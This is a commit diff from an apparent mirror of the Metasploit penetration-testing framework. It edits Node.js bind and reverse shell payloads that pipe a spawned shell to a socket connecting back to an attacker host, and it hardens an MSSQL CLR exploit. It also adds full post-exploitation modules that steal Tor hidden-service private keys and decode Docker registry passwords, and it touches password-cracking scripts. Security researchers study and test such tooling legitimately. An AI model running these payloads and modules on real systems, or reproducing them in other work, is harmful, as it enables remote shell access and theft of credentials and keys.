infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'master' of https://github.com/rapid7/metasploit-framework into add_smb1_scanner

bug/bundler_fix
loftwing 2017-09-14 17:00:45 -05:00
parent 646dda7958 9b5350ff9c
commit e88b766276
24 changed files with 242 additions and 76 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

18
lib/msf/core/payload/nodejs.rb
View File

@ -18,8 +18,13 @@ module Msf::Payload::NodeJS
var server = net.createServer(function(socket) {
var sh = cp.spawn(cmd, []);
socket.pipe(sh.stdin);
util.pump(sh.stdout, socket);
util.pump(sh.stderr, socket);
if (typeof util.pump === "undefined") {
sh.stdout.pipe(client.socket);
sh.stderr.pipe(client.socket);
} else {
util.pump(sh.stdout, client.socket);
util.pump(sh.stderr, client.socket);
}
});
server.listen(#{datastore['LPORT']});
})();
@ -53,8 +58,13 @@ module Msf::Payload::NodeJS
var client = this;
client.socket = net.connect(#{datastore['LPORT']}, "#{lhost}", #{tls_hash} function() {
client.socket.pipe(sh.stdin);
util.pump(sh.stdout, client.socket);
util.pump(sh.stderr, client.socket);
if (typeof util.pump === "undefined") {
sh.stdout.pipe(client.socket);
sh.stderr.pipe(client.socket);
} else {
util.pump(sh.stdout, client.socket);
util.pump(sh.stderr, client.socket);
}
});
})();
EOS

16
modules/exploits/windows/mssql/mssql_clr_payload.rb
View File

@ -96,7 +96,13 @@ class MetasploitModule < Msf::Exploit::Remote
end
def set_trustworthy(on)
mssql_query("ALTER DATABASE [#{datastore['DATABASE']}] SET TRUSTWORTHY #{on ? 'ON' : 'OFF'}", false)
result = mssql_query("ALTER DATABASE [#{datastore['DATABASE']}] SET TRUSTWORTHY #{on ? 'ON' : 'OFF'}", false)
unless result[:errors].empty?
result[:errors].each do |err|
vprint_error(err)
end
fail_with(Failure::Unknown, "Failed to change Trustworthy setting")
end
end
def is_trustworthy
@ -112,7 +118,13 @@ RECONFIGURE;
EXEC sp_configure 'clr enabled', #{enable ? 1 : 0};
RECONFIGURE;
^
mssql_query(query, false)
result = mssql_query(query, false)
unless result[:errors].empty?
result[:errors].each do |err|
vprint_error(err)
end
fail_with(Failure::Unknown, "Failed to change CLR setting")
end
end
def is_clr_enabled

3
modules/nops/aarch64/simple.rb
View File

@ -40,4 +40,5 @@ class MetasploitModule < Msf::Nop
end
return ([nops[0]].pack("V*") * (length/4))
end
end
end

2
modules/payloads/singles/cmd/unix/bind_nodejs.rb
View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
module MetasploitModule
CachedSize = 1843
CachedSize = 2351
include Msf::Payload::Single
include Msf::Payload::NodeJS

2
modules/payloads/singles/cmd/unix/reverse_nodejs.rb
View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
module MetasploitModule
CachedSize = 1971
CachedSize = 2423
include Msf::Payload::Single
include Msf::Payload::NodeJS

2
modules/payloads/singles/nodejs/shell_bind_tcp.rb
View File

@ -13,7 +13,7 @@ require 'msf/base/sessions/command_shell'
module MetasploitModule
CachedSize = 456
CachedSize = 583
include Msf::Payload::Single
include Msf::Payload::NodeJS

2
modules/payloads/singles/nodejs/shell_reverse_tcp.rb
View File

@ -13,7 +13,7 @@ require 'msf/base/sessions/command_shell'
module MetasploitModule
CachedSize = 488
CachedSize = 601
include Msf::Payload::Single
include Msf::Payload::NodeJS

2
modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb
View File

@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
module MetasploitModule
CachedSize = 516
CachedSize = 629
include Msf::Payload::Single
include Msf::Payload::NodeJS

103
modules/post/linux/gather/tor_hiddenservices.rb Normal file
View File

@ -0,0 +1,103 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Adapted from post/linux/gather/enum_configs.rb
##
class MetasploitModule < Msf::Post
include Msf::Post::Linux::System
include Msf::Post::Linux::Priv
def initialize(info={})
super( update_info( info,
'Name' => 'Linux Gather TOR Hidden Services',
'Description' => %q{
This module collects the hostnames name and private keys of
any TOR Hidden Services running on the target machine. It
will search for torrc and if found, will parse it for the
directories of Hidden Services. However, root permissions
are required to read them as they are owned by the user that
TOR runs as, usually a separate account.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Harvey Phillips <xcellerator[at]gmx.com>',
],
'Platform' => ['linux'],
'SessionTypes' => ['shell', 'meterpreter']
))
end
def run
distro = get_sysinfo
h = get_host
print_status("Running module against #{h}")
print_status("Info:")
print_status("\t#{distro[:version]}")
print_status("\t#{distro[:kernel]}")
print_status("Looking for torrc...")
find_torrc
end
def save(file, data, ltype, ctype="text/plain")
fname = ::File.basename(file)
loot = store_loot(ltype, ctype, session, data, fname)
print_status("#{fname} stored in #{loot.to_s}")
end
def get_host
case session.type
when /meterpreter/
host = sysinfo["Computer"]
when /shell/
host = cmd_exec("hostname").chomp
end
return host
end
def find_torrc
config = cmd_exec("locate 'torrc' | grep -v 'torrc.5.gz'").split("\n")
if config.length == 0
print_error ("No torrc file found, maybe it goes by a different name?")
else
hidden = Array.new
# For every torrc file found, parse them for HiddenServiceDir
config.each do |c|
print_good("Torrc file found at #{c}")
services = cmd_exec("cat #{c} | grep HiddenServiceDir | grep -v '#' | cut -d ' ' -f 2").split("\n")
# For each HiddenServiceDir found in the torrc(s), push them to the hidden array
services.each do |s|
hidden.push(s)
end
end
# Remove any duplicate entries
hidden = hidden.uniq
# If hidden is empty, then no Hidden Services are running.
if hidden.length != 0
print_good("#{hidden.length} hidden services have been found!")
else
print_bad("No hidden services were found!")
end
if is_root?
# For all the Hidden Services found, loot hostname file
hidden.each do |f|
output = read_file("#{f}hostname")
save(f, output, "tor.#{f.split("/")[-1]}.hostname") if output && output !~ /No such file or directory/
end
# For all the Hidden Services found, loot private_key file
hidden.each do |f|
output = read_file("#{f}private_key")
save(f, output, "tor.#{f.split("/")[-1]}.privatekey") if output && output !~ /No such file or directory/
end
else
print_error("Hidden Services were found, but we need root to access the directories")
end
end
end
end

93
modules/post/multi/gather/docker_creds.rb Normal file
View File

@ -0,0 +1,93 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'json'
class MetasploitModule < Msf::Post
include Msf::Post::File
include Msf::Post::Unix
def initialize(info={})
super( update_info(info,
'Name' => 'Multi Gather Docker Credentials Collection',
'Description' => %q{
This module will collect the contents of all users' .docker directories on the targeted
machine. If the user has already push to docker hub, chances are that the password was
saved in base64 (default behavior).
},
'License' => MSF_LICENSE,
'Author' => ['Flibustier'],
'Platform' => %w{ bsd linux osx unix },
'SessionTypes' => ['shell']
))
end
# This module is largely based on gpg_creds.rb.
def run
print_status("Finding .docker directories")
paths = enum_user_directories.map {|d| d + "/.docker"}
# Array#select! is only in 1.9
paths = paths.select { |d| directory?(d) }
if paths.nil? || paths.empty?
print_error("No users found with a .docker directory")
return
end
download_loot(paths)
end
def download_loot(paths)
print_status("Looting #{paths.count} directories")
paths.each do |path|
path.chomp!
file = "config.json"
target = "#{path}/#{file}"
if file? target
print_status("Downloading #{target} -> #{file}")
extract(target)
end
end
end
def extract(target)
file = read_file(target)
parsed = JSON.parse(file)
if parsed["auths"]
parsed["auths"].each do |key, value|
vprint_status("key: #{key}")
value.each do |k,v|
if k == "auth"
plain = Rex::Text.decode_base64(v)
if plain.include? ":"
print_good("Found #{plain}")
username, password = plain.split(':')
credential_data = {
origin_type: :import,
module_fullname: self.fullname,
filename: target,
workspace_id: myworkspace_id,
service_name: 'docker',
realm_value: key,
realm_key: Metasploit::Model::Realm::Key::WILDCARD,
private_type: :password,
private_data: password,
username: username
}
create_credential(credential_data)
print_good("Saved credentials")
end
end
end
end
else
print_status("No credentials found in config file")
end
end
end

4
modules/post/multi/gather/gpg_creds.rb
View File

@ -29,7 +29,7 @@ class MetasploitModule < Msf::Post
# Array#select! is only in 1.9
paths = paths.select { |d| directory?(d) }
if paths.nil? or paths.empty?
if paths.nil? || paths.empty?
print_error("No users found with a .gnupg directory")
return
end
@ -49,7 +49,7 @@ class MetasploitModule < Msf::Post
if directory?(target)
next
end
print_status("Downloading #{path}#{sep}#{file} -> #{file}")
print_status("Downloading #{target} -> #{file}")
data = read_file(target)
file = file.split(sep).last
type = file.gsub(/\.gpg.*/, "").gsub(/gpg\./, "")

2
msfd
View File

@ -19,8 +19,6 @@ end
$:.unshift(File.expand_path(File.join(File.dirname(msfbase), 'lib')))
require 'msfenv'
$:.unshift(ENV['MSF_LOCAL_LIB']) if ENV['MSF_LOCAL_LIB']
require 'msf/base'

4
msfrpc
View File

@ -17,8 +17,6 @@ end
$:.unshift(File.expand_path(File.join(File.dirname(msfbase), 'lib')))
require 'msfenv'
$:.unshift(ENV['MSF_LOCAL_LIB']) if ENV['MSF_LOCAL_LIB']
require 'rex/parser/arguments'
@ -59,7 +57,6 @@ arguments.parse(ARGV) do |opt, idx, val|
end
end
unless opts['ServerHost']
$stderr.puts "[-] Error: a server IP must be specified (-a)"
$stderr.puts arguments.usage
@ -93,4 +90,3 @@ while(ARGV.shift)
end
Rex::Ui::Text::IrbShell.new(binding).run

2
msfrpcd
View File

@ -17,8 +17,6 @@ end
$:.unshift(File.expand_path(File.join(File.dirname(msfbase), 'lib')))
require 'msfenv'
$:.unshift(ENV['MSF_LOCAL_LIB']) if ENV['MSF_LOCAL_LIB']
require 'rex/parser/arguments'

1
msfvenom
View File

@ -16,7 +16,6 @@ require 'msf/ui'
require 'msf/base'
require 'msf/core/payload_generator'
class MsfVenomError < StandardError; end
class HelpError < StandardError; end
class UsageError < MsfVenomError; end

5
tools/password/cpassword_decrypt.rb
View File

@ -79,7 +79,6 @@ class CPassword
end
end
#
# Shows script usage
#
@ -88,7 +87,6 @@ def usage
exit
end
#
# Prints a status message
#
@ -96,7 +94,6 @@ def print_status(msg='')
$stderr.puts "[*] #{msg}"
end
#
# Prints an error message
#
@ -104,7 +101,6 @@ def print_error(msg='')
$stderr.puts "[-] #{msg}"
end
#
# Prints a good message
#
@ -112,7 +108,6 @@ def print_good(msg='')
$stderr.puts "[+] #{msg}"
end
#
# main
#

4
tools/password/halflm_second.rb
View File

@ -39,7 +39,6 @@ $args = Rex::Parser::Arguments.new(
"-s" => [ true, "The server challenge (default value 1122334455667788)" ],
"-h" => [ false, "Display this help information" ])
$args.parse(ARGV) { |opt, idx, val|
case opt
when "-n"
@ -81,8 +80,6 @@ if(pass.length != 7)
exit
end
pass = pass.upcase
hash = hash.downcase
@ -123,7 +120,6 @@ end
end
end
puts "[*] Trying four characters (eta: #{etime * cset.length * cset.length * cset.length} seconds)..."
0.upto(cset.length-1) do |c1|
0.upto(cset.length-1) do |c2|

14
tools/password/hmac_sha1_crack.rb
View File

@ -2,7 +2,7 @@
#
# $Id$
#
# This script cracks HMAC SHA1 hashes. It is strangely necessary as existing tools
# This script cracks HMAC SHA1 hashes. It is strangely necessary as existing tools
# have issues with binary salt values and extremely large salt values. The primary
# goal of this tool is to handle IPMI 2.0 HMAC SHA1 hashes.
#
@ -29,7 +29,6 @@ def usage
exit
end
hash_inp = ARGV.shift || usage()
word_inp = ARGV.shift || usage()
@ -51,17 +50,16 @@ hash_fd.each_line do |line|
$stderr.puts "[-] Invalid hash entry, missing field: #{line}"
next
end
unless h_salt =~ /^[a-f0-9]+$/i
unless h_salt =~ /^[a-f0-9]+$/i
$stderr.puts "[-] Invalid hash entry, salt must be in hex: #{line}"
next
end
hashes << [h_id, [h_salt].pack("H*"), [h_hash].pack("H*") ]
end
hash_fd.close
hash_fd.close
stime = Time.now.to_f
count = 0
count = 0
cracked = 0
word_fd.each_line do |line|
@ -75,10 +73,10 @@ word_fd.each_line do |line|
cracked += 1
end
count += 1
if count % 2500000 == 0
$stderr.puts "[*] Found #{cracked} passwords with #{hashes.length} left (#{(count / (Time.now.to_f - stime)).to_i}/s)"
end
end
end
hashes.delete_if {|e| e[3] }
break if hashes.length == 0

4
tools/password/lm2ntcrack.rb
View File

@ -70,7 +70,6 @@ $args = Rex::Parser::Arguments.new(
"-d" => [ true, "The domain (machine) name (NETLMv2/NETNTLMv2 type only)" ],
"-h" => [ false, "Display this help information" ])
$args.parse(ARGV) { |opt, idx, val|
case opt
when "-t"
@ -122,7 +121,6 @@ else
end
end
if type == "HALFLM" or type == "LM" or type == "NTLM" then
if srvchal != nil or clichal != nil or user != nil or domain != nil then
$stderr.puts "[*] No challenge, user or domain must be provided with this type"
@ -872,5 +870,3 @@ else
$stderr.puts "type must be of type : HALFLM/LM/NTLM/HALFNETLMv1/NETLMv1/NETNTLMv1/NETNTLM2_SESSION/NETLMv2/NETNTLMv2"
exit
end

20
tools/password/md5_lookup.rb
View File

@ -37,7 +37,6 @@ require 'rex'
require 'msf/core'
require 'optparse'
#
# Basic prints we can't live without
#
@ -71,7 +70,6 @@ module Md5LookupUtility
# @return [String] The name of the tool
attr_accessor :group_name
def initialize
self.config_file = Msf::Config.config_file
self.group_name = 'MD5Lookup'
@ -93,7 +91,6 @@ module Md5LookupUtility
end
end
# Saves the waiver so the warning won't show again after ack
#
# @return [void]
@ -101,7 +98,6 @@ module Md5LookupUtility
save_setting('waiver', true)
end
# Returns true if we don't have to show the warning again
#
# @return [Boolean]
@ -109,7 +105,6 @@ module Md5LookupUtility
load_setting('waiver') == 'true' ? true : false
end
private
# Saves a setting to Metasploit's config file
@ -124,7 +119,6 @@ module Md5LookupUtility
ini.to_file(self.config_file)
end
# Returns the value of a specific setting
#
# @param key_name [String] The name of the setting
@ -177,7 +171,6 @@ module Md5LookupUtility
)
end
# Returns the found cracked MD5 hash
#
# @param md5_hash [String] The MD5 hash to lookup
@ -192,10 +185,8 @@ module Md5LookupUtility
get_json_result(res)
end
private
# Parses the cracked result from a JSON input
# @param res [Rex::Proto::Http::Response] The Rex HTTP response
# @return [String] Found cracked MD5 hash
@ -217,7 +208,6 @@ module Md5LookupUtility
end
# This class parses the user-supplied options (inputs)
class OptsConsole
@ -275,10 +265,8 @@ module Md5LookupUtility
options
end
private
# Returns the parsed options from ARGV
#
# raise [OptionParser::InvalidOption] Invalid option found
@ -317,7 +305,6 @@ module Md5LookupUtility
return parser, options
end
# Returns the actual database names based on what the user wants
#
# @param list [String] A list of user-supplied database names
@ -339,7 +326,6 @@ module Md5LookupUtility
new_db_list
end
# Returns a list of all of the supported database symbols
#
# @return [Array<Symbol>] Database symbols
@ -357,7 +343,6 @@ module Md5LookupUtility
end
end
# This class decides how this process works
class Driver
@ -379,7 +364,6 @@ module Md5LookupUtility
end
end
# Main function
#
# @return [void]
@ -403,7 +387,6 @@ module Md5LookupUtility
end
end
# Cleans up the output file handler if exists
#
# @return [void]
@ -411,10 +394,8 @@ module Md5LookupUtility
@output_handle.close if @output_handle
end
private
# Saves the MD5 result to file
#
# @param result [Hash] The result that contains the MD5 information
@ -472,7 +453,6 @@ module Md5LookupUtility
end
#
# main
#

4
tools/password/vxencrypt.rb
View File

@ -1,3 +1,5 @@
#!/usr/bin/env ruby
#
# $Id$
#
# This script can be used to calculate hash values for VxWorks passwords.
@ -15,7 +17,6 @@ def hashit(inp)
hackit(sum)
end
def hackit(sum)
magic = 31695317
res = ((sum * magic) & 0xffffffff).to_s
@ -29,4 +30,3 @@ end
input = ARGV.shift || "flintstone"
$stderr.puts "[*] Hash for password '#{input}' is #{hashit(input)}"

4
tools/password/vxmaster.rb
View File

@ -12,7 +12,6 @@
# $Revision$
#
# VxWorks converts the clear-text password into single integer value. This value
# can only be one of about 210,000 possible options. The method below emulates
# what the vxencrypt utility does and was implemented based on publicly indexed
@ -128,7 +127,6 @@ seeds = []
end
seedsets << seeds
seeds = []
8.upto(12) do |slen|
0x23.upto(0x7c) do |cset|
@ -165,7 +163,6 @@ seeds = []
end
seedsets << seeds
# Calculate passwords and their hashes for all possible outputs
1.upto(209656) do |i|
found = false
@ -200,4 +197,3 @@ seedsets << seeds
exit(0)
end
end

1
tools/recon/list_interfaces.rb
View File

@ -19,7 +19,6 @@ require 'msfenv'
$:.unshift(ENV['MSF_LOCAL_LIB']) if ENV['MSF_LOCAL_LIB']
if RUBY_PLATFORM == "i386-mingw32"
begin
require 'network_interface'

6
tools/recon/makeiplist.rb
View File

@ -12,18 +12,17 @@
# mubix
#
msfbase = __FILE__
while File.symlink?(msfbase)
msfbase = File.expand_path(File.readlink(msfbase), File.dirname(msfbase))
end
$:.unshift(File.expand_path(File.join(File.dirname(msfbase), '..', '..', 'lib')))
require 'msfenv'
require 'rex'
require 'optparse'
class OptsConsole
def self.parse(args)
options = {'output' => 'iplist.txt'}
@ -78,7 +77,6 @@ Usage: #{__FILE__} [options]|
end
end
#
# Prints IPs
#
@ -91,7 +89,6 @@ def make_list(in_f, out_f)
end
end
#
# Returns file handles
#
@ -106,7 +103,6 @@ def load_files(in_f, out_f)
return handle_in, handle_out
end
options = OptsConsole.parse(ARGV)
in_f, out_f = load_files(options['input'], options['output'])